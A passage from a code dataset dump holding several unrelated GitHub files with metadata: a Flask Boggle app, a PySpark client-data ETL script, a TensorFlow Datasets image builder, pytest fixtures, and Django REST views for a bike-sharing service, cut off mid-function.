Generate game html\"\"\"\n\n # Create board and store it in session\n session['board'] = boggle_game.make_board()\n\n # If player has played before, add session info for highest score and times played.\n highscore = session.get('highscore', 0)\n times_played = session.get('times_played', 0)\n\n return render_template('game.html', board = session['board'], times_played = times_played, highscore = highscore)\n \n@app.route('/check-word')\ndef check_word():\n word = request.args['word']\n check_word = boggle_game.check_valid_word(session['board'], word)\n\n return ({'result': check_word})\n\n\n@app.route('/gameover', methods=['POST'])\ndef get_score():\n \"\"\" Add highscore and times_played to session \"\"\"\n\n # If highscore exists, check if current score from front-end is higher or not.\n if 'highscore' in session:\n if session['highscore'] < request.json['score']:\n session['highscore'] = request.json['score']\n else:\n session['highscore'] = request.json['score']\n\n # Increment times_played by one\n session['times_played'] = session.get('times_played', 0) + 1\n\n return ''", "repo_name": "f-westergren/flask-boggle", "sub_path": "app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 1455, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "boggle.Boggle", "line_number": 6, "usage_type": "call"}, {"api_name": "flask.Flask", "line_number": 8, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 18, "usage_type": "name"}, {"api_name": "flask.session.get", "line_number": 21, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 21, "usage_type": "name"}, {"api_name": "flask.session.get", "line_number": 22, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 22, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 24, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 24, "usage_type": "name"}, {"api_name": "flask.request.args", "line_number": 28, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 28, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 29, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 39, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 40, "usage_type": "name"}, {"api_name": "flask.request.json", "line_number": 40, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 40, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 41, "usage_type": "name"}, {"api_name": "flask.request.json", "line_number": 41, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 41, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 43, "usage_type": "name"}, {"api_name": "flask.request.json", "line_number": 43, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 43, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 46, "usage_type": "name"}, {"api_name": "flask.session.get", "line_number": 46, "usage_type": "call"}]} +{"seq_id": "5426809969", "text": "import argparse\nimport os\n\nfrom pyspark.sql import SparkSession\nfrom pyspark.sql.functions import col\nfrom pyspark.sql import DataFrame\n\nimport logging\nfrom logging.handlers import RotatingFileHandler\n\nfrom typing import TypeVar, Sequence\nimport sys\n\nos.environ['PYSPARK_PYTHON'] = sys.executable\nos.environ['PYSPARK_DRIVER_PYTHON'] = sys.executable\n\nT = TypeVar('T')\nC = TypeVar('C')\nD = TypeVar('D')\n\nlogger = logging.getLogger(\"KommatiPara-Log\")\nlogger.setLevel(logging.DEBUG)\n\nos.makedirs(\"logs\", exist_ok=True)\n\nhandler = RotatingFileHandler(\"logs/kommatipara.log\", maxBytes=200, backupCount=3)\nlogger.addHandler(handler)\n\nsc = SparkSession.builder.master(\"local\").appName(\"KommatiPara\").getOrCreate()\n\ndef load_csv(filepath: str) -> DataFrame:\n \"\"\"\n Load csv from a given filepath.\n\n :param str filepath: path to the .csv file\n :return: pyspark dataframe\n \"\"\"\n if os.path.exists(filepath):\n df = sc.read.option(\"header\", \"true\").csv(filepath)\n logger.debug(f\"Data loaded: {filepath}\")\n #log dataset loaded\n return df\n \n logger.error(f\"Filepath doesn't exist: {filepath}\")\n raise TypeError(f\"Filepath doesn't exist {filepath}\")\n\ndef filter_data(df: D, filters: Sequence[T], colname: C) -> D:\n \"\"\"\n Filters data given list of filters and a column name.\n\n :param dataframe df: dataframe to be filtered\n :param list filters: list of countries to keep\n :param colname str colname: name of the column for the filter criteria\n :return: filtered dataset\n \"\"\"\n logger.debug(f\"Filtering column: {colname} values: {filters}\")\n return df.filter(col(colname).isin(filters))\n\ndef remove_personal_info(df: DataFrame, personal_info: Sequence[str]) -> DataFrame:\n \"\"\"\n Drops personal info from the dataframe\n :param dataframe df: dataframe where to remove personal info\n :param personal_info list: list of columns to drop\n :return modified dataframe\n \"\"\"\n return df.drop(*personal_info)\n\ndef rename_columns(df: D, columns_to_rename: Sequence[T]) -> D:\n \"\"\"\n Renames columns from dataframe.\n\n :param dataframe df: dataframe where to rename\n :param list columns_to_rename: list of tuples (old name, new name)\n :return: dataframe with renamed columns\n \"\"\"\n logger.debug(f\"Data to be renamed: {columns_to_rename}\")\n for (old,new) in columns_to_rename:\n if not isinstance(new, str):\n logger.error(f\"New column is not a string: {type(new)}\")\n raise TypeError(f\"New column name must be a string, not {type(new)}\")\n df = df.withColumnRenamed(old, new)\n\n return df\n\ndef save_csv_output_file(df: DataFrame, path: str) -> None:\n \"\"\"\n Save output inside the path folder as csv and overwite if already exists\n :param dataframe df: dataframe to be saved\n :param string path: path to the folder where to save the output\n :return void\n \"\"\"\n\n df.write.option(\"header\",True).mode('overwrite').csv(path)\n logger.debug(f\"Output saved on: {path}\")\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('--d1', type=str, required=True, help='path to the first dataset')\n parser.add_argument('--d2', type=str, required=True, help='path to the second dataset')\n parser.add_argument('--f','--list', nargs='+', help='Filter on Country', required=True)\n\n opt = parser.parse_args()\n\n logger.debug(f\"Arguments parsed: {opt.d1}, {opt.d2}, {opt.f}\")\n\n df_clients = load_csv(opt.d1)\n df_fin = load_csv(opt.d2)\n\n df_clients = filter_data(df=df_clients, filters=opt.f, colname='country')\n\n df_full_clients = df_clients.join(df_fin, on=['id'], how='inner')\n\n df_full_clients = remove_personal_info(df=df_full_clients, personal_info=['first_name', 'last_name', 'cc_n'])\n\n df_full_clients = rename_columns(df=df_full_clients, columns_to_rename=[('id', 'client_identifier'), ('btc_a', 'bitcoin_address'), ('cc_t', 'credit_card_type')])\n\n save_csv_output_file(df=df_full_clients, path='client_data')", "repo_name": "giuseppefrn/Assignment-KommatiPara", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 4004, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "os.environ", "line_number": 14, "usage_type": "attribute"}, {"api_name": "sys.executable", "line_number": 14, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 15, "usage_type": "attribute"}, {"api_name": "sys.executable", "line_number": 15, "usage_type": "attribute"}, {"api_name": "typing.TypeVar", "line_number": 17, "usage_type": "call"}, {"api_name": "typing.TypeVar", "line_number": 18, "usage_type": "call"}, {"api_name": "typing.TypeVar", "line_number": 19, "usage_type": "call"}, {"api_name": "logging.getLogger", "line_number": 21, "usage_type": "call"}, {"api_name": "logging.DEBUG", "line_number": 22, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 24, "usage_type": "call"}, {"api_name": "logging.handlers.RotatingFileHandler", "line_number": 26, "usage_type": "call"}, {"api_name": "pyspark.sql.SparkSession.builder.master", "line_number": 29, "usage_type": "call"}, {"api_name": "pyspark.sql.SparkSession.builder", "line_number": 29, "usage_type": "attribute"}, {"api_name": "pyspark.sql.SparkSession", "line_number": 29, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 38, "usage_type": "call"}, {"api_name": "os.path", "line_number": 38, "usage_type": "attribute"}, {"api_name": "pyspark.sql.DataFrame", "line_number": 31, "usage_type": "name"}, {"api_name": "typing.Sequence", "line_number": 47, "usage_type": "name"}, {"api_name": "pyspark.sql.functions.col", "line_number": 57, "usage_type": "call"}, {"api_name": "pyspark.sql.DataFrame", "line_number": 59, "usage_type": "name"}, {"api_name": "typing.Sequence", "line_number": 59, "usage_type": "name"}, {"api_name": "typing.Sequence", "line_number": 68, "usage_type": "name"}, {"api_name": "pyspark.sql.DataFrame", "line_number": 85, "usage_type": "name"}, {"api_name": "argparse.ArgumentParser", "line_number": 97, "usage_type": "call"}]} +{"seq_id": "16415048403", "text": "\"\"\"romania dataset.\"\"\"\n\nimport tensorflow_datasets as tfds\nimport tensorflow as tf\nimport tifffile as tiff\nimport os\nimport re\n\n_DESCRIPTION = \"\"\"\"\"\"\n\n# TODO(romania): BibTeX citation\n_CITATION = \"\"\"\n\"\"\"\n\n_DATA_OPTIONS = ['all', 'artificial-mixtures', 'metabarcoding', 'metabarcoding2', 'metabarcoding3']\n\n\nclass RomaniaConfig(tfds.core.BuilderConfig):\n \"\"\"BuilderConfig for romania dataset.\"\"\"\n\n def __init__(self, dataset=None, selection=None, **kwargs):\n \"\"\"Constructs a RomaniaConfig.\n\n Args:\n selection: `str`, one of `_DATA_OPTIONS`.\n **kwargs: keyword arguments forwarded to super.\n \"\"\"\n\n if selection not in _DATA_OPTIONS:\n raise ValueError('Selection must be one of %s' % _DATA_OPTIONS)\n\n super(RomaniaConfig, self).__init__(\n version=tfds.core.Version('3.0.0'),\n release_notes={\n '3.0.0': 'new artificial mixtures and metabarcoding configs',\n '2.0.0': 'New dataset, metabarcoding config',\n '1.0.0': 'Full dataset'\n },\n **kwargs)\n self.selection = selection\n self.dataset = dataset\n\n\nclass Romania(tfds.core.GeneratorBasedBuilder):\n \"\"\"DatasetBuilder for romania dataset.\"\"\"\n\n MANUAL_DOWNLOAD_INSTRUCTIONS = \"\"\"\n Place the dataset tar.gz file in the `~/tensorflow_datasets/downloads/manual` dir.\n \"\"\"\n\n # pytype: disable=wrong-keyword-args\n BUILDER_CONFIGS = [\n RomaniaConfig(name='all', selection='all', dataset=\"romania-train-3.0.0.tar.gz\", description='All training samples'),\n RomaniaConfig(name='artificial-mixtures', selection='artificial-mixtures', dataset=\"romania-train-3.0.0.tar.gz\", description='All training samples'),\n RomaniaConfig(name='metabarcoding', selection='metabarcoding', dataset=\"romania-train-3.0.0.tar.gz\", description='Training samples that were identified with metabarcoding'),\n RomaniaConfig(name='metabarcoding2', selection='metabarcoding2', dataset=\"romania-train-3.0.0.tar.gz\", description='Training samples that were identified with metabarcoding, monosamples and art. mixtures'),\n RomaniaConfig(name='metabarcoding3', selection='metabarcoding3', dataset=\"romania-train-3.0.0.tar.gz\", description='Training samples that were identified with metabarcoding, additional Hypericum samples')\n ]\n\n # pytype: enable=wrong-keyword-args\n def _info(self) -> tfds.core.DatasetInfo:\n \"\"\"Returns the dataset metadata.\"\"\"\n\n channels = {str(i + 1): tfds.features.Tensor(dtype=tf.uint16, shape=(None, None), encoding='zlib') for i in\n range(6)}\n channels['9'] = tfds.features.Tensor(dtype=tf.uint16, shape=(None, None), encoding='zlib')\n masks = {str(i + 1): tfds.features.Tensor(dtype=tf.uint16, shape=(None, None), encoding='zlib') for i in\n range(6)}\n masks['9'] = tfds.features.Tensor(dtype=tf.uint16, shape=(None, None), encoding='zlib')\n\n features = {'channels': {**channels},\n 'masks': {**masks},\n 'filename': tf.string,\n 'species': tfds.features.ClassLabel(names_file=f'romania/{self.builder_config.selection}-classes-species.txt')}\n\n return tfds.core.DatasetInfo(\n builder=self,\n description=_DESCRIPTION,\n features=tfds.features.FeaturesDict(features),\n supervised_keys=None,\n homepage='https://github.com/lahr/icyt-tfds',\n citation=_CITATION,\n )\n\n def _split_generators(self, dl_manager: tfds.download.DownloadManager):\n \"\"\"Returns SplitGenerators.\"\"\"\n\n path = os.path.join(dl_manager.manual_dir, self.builder_config.dataset)\n\n if not tf.io.gfile.exists(path):\n raise AssertionError(\n f'You must download the dataset .tar.gz file and place it into {dl_manager.manual_dir}')\n\n path_iter = dl_manager.iter_archive(path)\n return {\n 'train': self._generate_examples(path_iter)\n }\n\n def _generate_examples(self, path_iter, split_name=None):\n \"\"\"Yields examples.\"\"\"\n\n path_regex = r'^(?:([^/\\n.A-Z]+)/)?([a-zA-Z]+\\.?[a-zA-Z]+)/(.*)/.*$'\n\n if self.builder_config.selection != 'all':\n with open(f'romania/{self.builder_config.selection}-measurements.txt') as f:\n measurements = tuple([line.rstrip() for line in f])\n\n for filename, fobj in path_iter:\n assert filename is not None\n assert fobj is not None\n\n m = re.match(path_regex, filename)\n\n if self.builder_config.selection != 'all':\n if not m.group(3).startswith(measurements):\n continue\n\n species = m.group(2)\n\n img = tiff.imread(fobj)\n num_channels = img.shape[-1] / 2\n\n if num_channels == 7 or num_channels == 9:\n channels = {str(i + 1): img[:, :, i] for i in range(0, 6)}\n channels['9'] = img[:, :, 6]\n masks = {str(i - 6): img[:, :, i] for i in range(7, 13)}\n masks['9'] = img[:, :, 13]\n\n elif num_channels == 12:\n channels = {str(i + 1): img[:, :, i] for i in range(0, 6)}\n channels['9'] = img[:, :, 8]\n masks = {str(i - 11): img[:, :, i] for i in range(12, 18)}\n masks['9'] = img[:, :, 20]\n\n else:\n raise AssertionError(f'Unknown number of channels ({num_channels}) for file {filename}')\n\n features = {\n 'channels': {**channels},\n 'masks': {**masks},\n 'filename': filename,\n 'species': species}\n\n yield filename, features\n", "repo_name": "lahr/icyt-tfds", "sub_path": "romania/romania.py", "file_name": "romania.py", "file_ext": "py", "file_size_in_byte": 5760, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "tensorflow_datasets.core", "line_number": 18, "usage_type": "attribute"}, {"api_name": "tensorflow_datasets.core.Version", "line_number": 33, "usage_type": "call"}, {"api_name": "tensorflow_datasets.core", "line_number": 33, "usage_type": "attribute"}, {"api_name": "tensorflow_datasets.core", "line_number": 44, "usage_type": "attribute"}, {"api_name": "tensorflow_datasets.features.Tensor", "line_number": 64, "usage_type": "call"}, {"api_name": "tensorflow_datasets.features", "line_number": 64, "usage_type": "attribute"}, {"api_name": "tensorflow.uint16", "line_number": 64, "usage_type": "attribute"}, {"api_name": "tensorflow_datasets.features.Tensor", "line_number": 66, "usage_type": "call"}, {"api_name": "tensorflow_datasets.features", "line_number": 66, "usage_type": "attribute"}, {"api_name": "tensorflow.uint16", "line_number": 66, "usage_type": "attribute"}, {"api_name": "tensorflow_datasets.features.Tensor", "line_number": 67, "usage_type": "call"}, {"api_name": "tensorflow_datasets.features", "line_number": 67, "usage_type": "attribute"}, {"api_name": "tensorflow.uint16", "line_number": 67, "usage_type": "attribute"}, {"api_name": "tensorflow_datasets.features.Tensor", "line_number": 69, "usage_type": "call"}, {"api_name": "tensorflow_datasets.features", "line_number": 69, "usage_type": "attribute"}, {"api_name": "tensorflow.uint16", "line_number": 69, "usage_type": "attribute"}, {"api_name": "tensorflow.string", "line_number": 73, "usage_type": "attribute"}, {"api_name": "tensorflow_datasets.features.ClassLabel", "line_number": 74, "usage_type": "call"}, {"api_name": "tensorflow_datasets.features", "line_number": 74, "usage_type": "attribute"}, {"api_name": "tensorflow_datasets.core.DatasetInfo", "line_number": 76, "usage_type": "call"}, {"api_name": "tensorflow_datasets.core", "line_number": 76, "usage_type": "attribute"}, {"api_name": "tensorflow_datasets.features.FeaturesDict", "line_number": 79, "usage_type": "call"}, {"api_name": "tensorflow_datasets.features", "line_number": 79, "usage_type": "attribute"}, {"api_name": "tensorflow_datasets.core", "line_number": 61, "usage_type": "attribute"}, {"api_name": "tensorflow_datasets.download", "line_number": 85, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 88, "usage_type": "call"}, {"api_name": "os.path", "line_number": 88, "usage_type": "attribute"}, {"api_name": "tensorflow.io.gfile.exists", "line_number": 90, "usage_type": "call"}, {"api_name": "tensorflow.io", "line_number": 90, "usage_type": "attribute"}, {"api_name": "re.match", "line_number": 112, "usage_type": "call"}, {"api_name": "tifffile.imread", "line_number": 120, "usage_type": "call"}]} +{"seq_id": "14075355", "text": "import pytest\nfrom pytest_factoryboy import register\nfrom graphql_jwt.shortcuts import get_token\n\nfrom factories.plans import PlanFactory\nfrom factories.companies import CompanyFactory\nfrom factories.dealings import DealingFactory\nfrom factories.distribute_logs import DistributeLogFactory\nfrom factories.items import ItemFactory\nfrom factories.exchange_applied_items import ExchangeAppliedItemFactory\nfrom factories.exchanged_item_logs import ExchangedItemLogFactory\nfrom factories.purchased_point_logs import PurchasedPointLogFactory\n\nregister(PlanFactory)\nregister(CompanyFactory)\nregister(DealingFactory)\nregister(DistributeLogFactory)\nregister(ItemFactory)\nregister(ExchangeAppliedItemFactory)\nregister(ExchangedItemLogFactory)\nregister(PurchasedPointLogFactory)\n\nfrom pdb import set_trace as st\n\n\n@pytest.fixture(autouse=True)\ndef test_generate_plan_fixtures(plan_factory):\n plan_factory.create(name=\"free\", fee=0)\n plan_factory.create(name=\"standard\", fee=2000)\n plan_factory.create(name=\"professional\", fee=5000)\n assert True\n\n\n@pytest.fixture\ndef company_fixture(company_factory):\n return company_factory.create(point=1000)\n\n\n@pytest.fixture\ndef create_user_fixture(django_user_model):\n \"\"\"\n userが作成される時に、同時にaccountとprofileも作成される\n \"\"\"\n\n def make_user(**kwargs):\n return django_user_model.objects.create_user(**kwargs)\n\n return make_user\n\n\n# from graphql_jwt.testcases import JSONWebTokenTestCase, JSONWebTokenClient\n# @pytest.fixture\n# def logged_in_client_fixture(company_fixture, create_user_fixture):\n# user = create_user_fixture(\n# email=\"user@test.jp\",\n# password=\"test_password\",\n# company=company_fixture,\n# is_active=True,\n# is_admin=True,\n# )\n\n# client = JSONWebTokenTestCase().client_class()\n# client.authenticate(user)\n# return client, user\n\n\n@pytest.fixture\ndef logged_in_client_fixture(company_fixture, create_user_fixture):\n \"\"\"ログイン済みユーザーのfixture\"\"\"\n user = create_user_fixture(\n email=\"user@test.jp\",\n password=\"test_password\",\n company=company_fixture,\n is_active=True,\n is_admin=True,\n )\n\n headers = {\"HTTP_AUTHORIZATION\": f\"JWT {get_token(user)}\"}\n\n return user, headers\n", "repo_name": "mizutaninaoki/poppie", "sub_path": "test/conftest.py", "file_name": "conftest.py", "file_ext": "py", "file_size_in_byte": 2305, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "pytest_factoryboy.register", "line_number": 14, "usage_type": "call"}, {"api_name": "factories.plans.PlanFactory", "line_number": 14, "usage_type": "argument"}, {"api_name": "pytest_factoryboy.register", "line_number": 15, "usage_type": "call"}, {"api_name": "factories.companies.CompanyFactory", "line_number": 15, "usage_type": "argument"}, {"api_name": "pytest_factoryboy.register", "line_number": 16, "usage_type": "call"}, {"api_name": "factories.dealings.DealingFactory", "line_number": 16, "usage_type": "argument"}, {"api_name": "pytest_factoryboy.register", "line_number": 17, "usage_type": "call"}, {"api_name": "factories.distribute_logs.DistributeLogFactory", "line_number": 17, "usage_type": "argument"}, {"api_name": "pytest_factoryboy.register", "line_number": 18, "usage_type": "call"}, {"api_name": "factories.items.ItemFactory", "line_number": 18, "usage_type": "argument"}, {"api_name": "pytest_factoryboy.register", "line_number": 19, "usage_type": "call"}, {"api_name": "factories.exchange_applied_items.ExchangeAppliedItemFactory", "line_number": 19, "usage_type": "argument"}, {"api_name": "pytest_factoryboy.register", "line_number": 20, "usage_type": "call"}, {"api_name": "factories.exchanged_item_logs.ExchangedItemLogFactory", "line_number": 20, "usage_type": "argument"}, {"api_name": "pytest_factoryboy.register", "line_number": 21, "usage_type": "call"}, {"api_name": "factories.purchased_point_logs.PurchasedPointLogFactory", "line_number": 21, "usage_type": "argument"}, {"api_name": "pytest.fixture", "line_number": 26, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 34, "usage_type": "attribute"}, {"api_name": "pytest.fixture", "line_number": 39, "usage_type": "attribute"}, {"api_name": "graphql_jwt.shortcuts.get_token", "line_number": 78, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 67, "usage_type": "attribute"}]} +{"seq_id": "27199747982", "text": "from allauth.socialaccount.models import SocialApp\nfrom django.contrib.auth import get_user_model\nfrom django.contrib.gis.geos import Point\nfrom django.contrib.gis.measure import D\nfrom django.contrib.sites.shortcuts import get_current_site\nfrom django.contrib.syndication.views import Feed\nfrom django.core.paginator import Paginator\nfrom django.urls import reverse\nfrom django.utils.feedgenerator import Rss201rev2Feed\nfrom django.utils.timezone import now, timedelta\nfrom preferences import preferences\nfrom rest_framework import exceptions, generics, mixins, status, viewsets\nfrom rest_framework.authentication import SessionAuthentication, TokenAuthentication\nfrom rest_framework.decorators import (\n action,\n api_view,\n authentication_classes,\n permission_classes,\n)\nfrom rest_framework.permissions import (\n SAFE_METHODS,\n AllowAny,\n BasePermission,\n IsAuthenticated,\n)\nfrom rest_framework.response import Response\nfrom rest_framework.views import exception_handler\nfrom rest_framework_api_key.permissions import HasAPIKey\n\nfrom bikesharing.models import Bike, Location, LocationTracker, Rent, Station\nfrom cykel.models import CykelLogEntry\n\nfrom .authentication import BasicTokenAuthentication\nfrom .serializers import (\n BikeSerializer,\n CreateRentSerializer,\n LocationTrackerUpdateSerializer,\n MaintenanceBikeSerializer,\n RentSerializer,\n SocialAppSerializer,\n StationSerializer,\n UserDetailsSerializer,\n)\n\n\nclass BikeViewSet(viewsets.ReadOnlyModelViewSet):\n queryset = Bike.objects.all()\n serializer_class = BikeSerializer\n\n\nclass StationViewSet(viewsets.ReadOnlyModelViewSet):\n queryset = Station.objects.all()\n serializer_class = StationSerializer\n\n\nclass CanRentBikePermission(BasePermission):\n \"\"\"The request is authenticated as a user and has add_rent permission.\"\"\"\n\n message = \"You cannot rent a bike at this time.\"\n\n def has_permission(self, request, view):\n if not request.user or not request.user.is_authenticated:\n return False\n\n if request.method in SAFE_METHODS:\n return True\n\n return request.user.has_perm(\"bikesharing.add_rent\")\n\n\nclass CanUseMaintenancePermission(BasePermission):\n \"\"\"The request is authenticated as a user and has maintenance\n permission.\"\"\"\n\n def has_permission(self, request, view):\n if not request.user or not request.user.is_authenticated:\n return False\n\n return request.user.has_perm(\"bikesharing.maintain\")\n\n\n@permission_classes([IsAuthenticated, CanRentBikePermission])\nclass RentViewSet(\n mixins.CreateModelMixin,\n mixins.RetrieveModelMixin,\n mixins.ListModelMixin,\n viewsets.GenericViewSet,\n):\n def get_serializer_class(self):\n if self.action == \"create\":\n return CreateRentSerializer\n else:\n return RentSerializer\n\n def get_queryset(self):\n user = self.request.user\n return Rent.objects.filter(user=user, rent_end=None)\n\n def create(self, request):\n resp = super().create(request)\n if resp.status_code != status.HTTP_201_CREATED:\n return resp\n\n rent = self.get_queryset().get(id=resp.data[\"id\"])\n\n if rent.bike.state == Bike.State.MISSING:\n data = {}\n if rent.start_location:\n data = {\"location_id\": rent.start_location.id}\n\n CykelLogEntry.objects.create(\n content_object=rent.bike,\n action_type=\"cykel.bike.missing_reporting\",\n data=data,\n )\n\n # override output with RentSerializer\n serializer = RentSerializer(rent, context={\"request\": request})\n headers = self.get_success_headers(serializer.data)\n return Response(\n serializer.data, status=status.HTTP_201_CREATED, headers=headers\n )\n\n @action(detail=True, methods=[\"post\"])\n def finish(self, request, pk=None):\n rent = self.get_object()\n\n lat = request.data.get(\"lat\")\n lng = request.data.get(\"lng\")\n\n if rent.user != request.user:\n return Response(\n {\"error\": \"rent belongs to another user\"},\n status=status.HTTP_403_PERMISSON_DENIED,\n )\n if rent.rent_end is not None:\n return Response(\n {\"error\": \"rent was already finished\"}, status=status.HTTP_410_GONE\n )\n\n end_location = None\n if lat and lng:\n end_location = Location.objects.create(\n bike=rent.bike,\n source=Location.Source.USER,\n reported_at=now(),\n geo=Point(float(lng), float(lat), srid=4326),\n )\n\n rent.end(end_location)\n\n return Response({\"success\": True})\n\n @action(detail=True, methods=[\"post\"])\n def unlock(self, request, pk=None):\n rent = self.get_object()\n\n if rent.user != request.user:\n return Response(\n {\"error\": \"rent belongs to another user\"},\n status=status.HTTP_403_PERMISSON_DENIED,\n )\n\n if rent.rent_end is not None:\n return Response(\n {\"error\": \"rent was already finished\"}, status=status.HTTP_410_GONE\n )\n\n try:\n data = rent.unlock()\n except Exception as e:\n print(e)\n return Response({\"success\": False})\n\n return Response({\"success\": True, \"data\": data})\n\n\n@api_view([\"POST\"])\n@permission_classes([HasAPIKey])\ndef updatebikelocation(request):\n device_id = request.data.get(\"device_id\")\n if not (device_id):\n return Response({\"error\": \"device_id missing\"}, status=400)\n try:\n tracker = LocationTracker.objects.get(device_id=device_id)\n except LocationTracker.DoesNotExist:\n return Response({\"error\": \"tracker does not exist\"}, status=404)\n\n serializer = LocationTrackerUpdateSerializer(tracker, data=request.data)\n if not serializer.is_valid():\n return Response(serializer.errors, status=400)\n\n serializer.save()\n\n lat = request.data.get(\"lat\")\n lng = request.data.get(\"lng\")\n accuracy = request.data.get(\"accuracy\")\n loc = None\n\n if lat and lng:\n loc = Location(\n source=Location.Source.TRACKER,\n reported_at=now(),\n tracker=tracker,\n geo=Point(float(lng), float(lat), srid=4326),\n )\n if tracker.bike:\n loc.bike = tracker.bike\n if accuracy:\n loc.accuracy = accuracy\n loc.save()\n\n if tracker.bike:\n bike = tracker.bike\n bike.last_reported = now()\n\n if loc and not loc.internal:\n # check if bike is near station and assign it to that station\n # distance ist configured in prefernces\n max_distance = preferences.BikeSharePreferences.station_match_max_distance\n station_closer_than_Xm = Station.objects.filter(\n location__distance_lte=(loc.geo, D(m=max_distance)),\n status=Station.Status.ACTIVE,\n ).first()\n if station_closer_than_Xm:\n bike.current_station = station_closer_than_Xm\n else:\n bike.current_station = None\n\n bike.save()\n\n someminutesago = now() - timedelta(minutes=15)\n data = {}\n if loc:\n data = {\"location_id\": loc.id}\n\n if tracker.tracker_status == LocationTracker.Status.MISSING:\n action_type = \"cykel.tracker.missing_reporting\"\n CykelLogEntry.create_unless_time(\n someminutesago, content_object=tracker, action_type=action_type, data=data\n )\n\n if tracker.bike and tracker.bike.state == Bike.State.MISSING:\n action_type = \"cykel.bike.missing_reporting\"\n CykelLogEntry.create_unless_time(\n someminutesago,\n content_object=tracker.bike,\n action_type=action_type,\n data=data,\n )\n\n if not loc:\n return Response({\"success\": True, \"warning\": \"lat/lng missing\"})\n\n return Response({\"success\": True})\n\n\n@authentication_classes(\n [SessionAuthentication, TokenAuthentication, BasicTokenAuthentication]\n)\n@permission_classes([IsAuthenticated, CanUseMaintenancePermission])\nclass MaintenanceViewSet(viewsets.ViewSet):\n @action(detail=False, methods=[\"GET\"])\n def mapdata(self, request):\n bikes = Bike.objects.filter(location__isnull=False).distinct()\n serializer = MaintenanceBikeSerializer(bikes, many=True)\n return Response(serializer.data)\n\n @action(detail=False, methods=[\"GET\"])\n def logentryfeed(self, request):\n feed = LogEntryFeed()\n return feed(request)\n\n\nclass UserDetailsView(generics.RetrieveAPIView):\n \"\"\"Reads UserModel fields Accepts GET method.\n\n Default accepted fields: username Default display fields: pk,\n username Read-only fields: pk Returns UserModel fields.\n \"\"\"\n\n serializer_class = UserDetailsSerializer\n permission_classes = (IsAuthenticated,)\n\n def get_object(self):\n return self.request.user\n\n def get_queryset(self):\n \"\"\"Adding this method since it is sometimes called when using django-\n rest-swagger https://github.com/Tivix/django-rest-auth/issues/275.\"\"\"\n return get_user_model().objects.none()\n\n\n@permission_classes([AllowAny])\nclass LoginProviderViewSet(\n mixins.ListModelMixin,\n viewsets.GenericViewSet,\n):\n \"\"\"return the configured social login providers.\"\"\"\n\n serializer_class = SocialAppSerializer\n\n def get_queryset(self):\n return SocialApp.objects.filter(sites__id=get_current_site(self.request).id)\n\n\nclass RSS20PaginatedFeed(Rss201rev2Feed):\n def add_root_elements(self, handler):\n super(Rss201rev2Feed, self).add_root_elements(handler)\n\n if self.feed[\"page\"] > 1:\n handler.addQuickElement(\n \"link\",\n \"\",\n {\n \"rel\": \"first\",\n \"href\": self.feed[\"feed_url\"],\n },\n )\n\n if self.feed[\"page\"] < self.feed[\"last_page\"]:\n handler.addQuickElement(\n \"link\",\n \"\",\n {\n \"rel\": \"last\",\n \"href\": (f\"{self.feed['feed_url']}?page={self.feed['last_page']}\"),\n },\n )\n\n if self.feed[\"page\"] > 1:\n handler.addQuickElement(\n \"link\",\n \"\",\n {\n \"rel\": \"previous\",\n \"href\": (f\"{self.feed['feed_url']}?page={self.feed['page'] - 1}\"),\n },\n )\n\n if self.feed[\"page\"] < self.feed[\"last_page\"]:\n handler.addQuickElement(\n \"link\",\n \"\",\n {\n \"rel\": \"next\",\n \"href\": (f\"{self.feed['feed_url']}?page={self.feed['page'] + 1}\"),\n },\n )\n\n\nclass LogEntryFeed(Feed):\n feed_type = RSS20PaginatedFeed\n\n def title(self):\n return f\"Maintenance Events of {preferences.BikeSharePreferences.system_name}\"\n\n def description(self):\n return self.title()\n\n def link(self):\n return reverse(\n \"admin:%s_%s_changelist\"\n % (CykelLogEntry._meta.app_label, CykelLogEntry._meta.model_name)\n )\n\n def get_entries(self, request):\n return CykelLogEntry.objects.order_by(\"-timestamp\").all()\n\n def get_object(self, request):\n page = int(request.GET.get(\"page\", 1))\n entries = self.get_entries(request)\n paginator = Paginator(entries, 25)\n return {\"page\": page, \"paginator\": paginator}\n\n def items(self, obj):\n return obj[\"paginator\"].get_page(obj[\"page\"])\n\n def feed_extra_kwargs(self, obj):\n context = super().feed_extra_kwargs(obj)\n context[\"page\"] = obj[\"page\"]\n context[\"last_page\"] = obj[\"paginator\"].num_pages\n return context\n\n def item_title(self, item):\n return item.display()\n\n def item_pubdate(self, item):\n return item.timestamp\n\n def item_updateddate(self, item):\n return item.timestamp\n\n def item_description(self, item):\n return self.item_title(item)\n\n def item_link(self, item):\n return reverse(\n \"admin:%s_%s_change\" % (item._meta.app_label, item._meta.model_name),\n args=[item.id],\n )\n\n\nclass FilteredLogEntryFeed(LogEntryFeed):\n def get_entries(self, request):\n return 